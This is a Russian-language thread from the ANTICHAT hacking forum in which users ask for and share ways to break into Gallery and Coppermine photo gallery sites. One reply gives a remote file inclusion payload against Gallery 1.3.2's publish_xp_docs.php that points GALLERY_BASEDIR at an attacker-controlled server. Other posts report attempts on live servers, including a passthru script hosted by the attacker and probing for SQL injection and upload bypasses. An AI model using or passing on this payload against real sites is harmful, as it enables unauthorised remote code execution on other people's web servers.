HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости Gallery v1.4.1
  #1  
Старый 13.07.2005, 17:15
Neiropunk
Новичок
Регистрация: 25.06.2005
Сообщений: 1
С нами: 10987023

Репутация: 0
По умолчанию Уязвимости Gallery v1.4.1

Может это и не совсем форум, но я даже не знаю к чему это отнести. Прошу рассказать о знаниях по поводу Powered by Gallery v1.4.1. Если есть методы по взлому - прошу поделиться.
 
Ответить с цитированием

  #2  
Старый 13.07.2005, 21:10
К.е.Н
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
С нами: 10973306

Репутация: 6
По умолчанию

Уязвимость обнаружена в 1.3.2. И поэтому тебе это врятли поможет но навсякий случай попробуй.
Gallery – система управления изображениями от http://gallery.sourceforge.net.

Gallery v1.3.2 содержит новую особенность, которая позволяет пользователям публиковать изображения Web сайте, используя систему публикации Windows XP Publishing subsystem. Обнаруженная уязвимость в этой особенности (а точнее в сценарии publish_xp_docs.php) позволяет злонамеренному пользователю обработать URL таким образом, что он может получить удаленный доступ к Web серверу с привилегиями Web сервера.

Пример:

http://hostname/gallery/publish_xp_docs.php?
GALLERY_BASEDIR=http://your.evil.server.tdl/
 
Ответить с цитированием

  #3  
Старый 14.07.2005, 03:46
ProTeuS
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,367
С нами: 11291486

Репутация: 2175


По умолчанию

такая тема - какие версии только не пробовал, резальт один:

Fatal error: Call to undefined function: _() in /home/users/gallery/htdocs/publish_xp_docs.php on line 28

это типа пат4енная, или на своей стороне нужно по-особому index.php сосотавить (у меня простой passthru был)???
 
Ответить с цитированием

  #4  
Старый 17.07.2005, 16:32
К.е.Н
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
С нами: 10973306

Репутация: 6
По умолчанию

Это версия более новаю и у нее пока багов не нашли
 
Ответить с цитированием

  #5  
Старый 02.06.2006, 23:47
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами: 10958786

Репутация: 1034


По умолчанию

Ой блин да простят меня все за то что я такое старьё поднял но у меня тут вопрос ребром встал а баги как таковой не нашол интересует Coppermine Photo Gallery v1.3.2 перерыл всё а толком ничего нету галлерея вроде не патченная но файла publish_xp_docs.php и xp_publish.php нема =(
 
Ответить с цитированием

  #6  
Старый 03.06.2006, 00:41
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

__________________
 
Ответить с цитированием

  #7  
Старый 03.06.2006, 01:14
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами: 10958786

Репутация: 1034


По умолчанию

Ага не помогает
 
Ответить с цитированием

  #8  
Старый 03.06.2006, 01:29
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами: 10958786

Репутация: 1034


По умолчанию

Из разрешённых на заливку файлов только формат .jpg остальное всё в топке (запрещено) sql иньекция не катит =(

сплойт себя немного странно повёл но результат 1 файла с которым работает сплойт нет на серваке =(

Также к слову там установленна
Код:
Axis 2120 Network Camera 2.30
но по уязвимости этого вообще нечего не нашол толком =(

Последний раз редактировалось Nova; 03.06.2006 в 01:49.. Причина: Добавил чтоб не флудить =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Действующие уязвимости почтовых систем РФ Maxmen Уязвимости Mail-сервис 16 12.12.2004 16:48
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.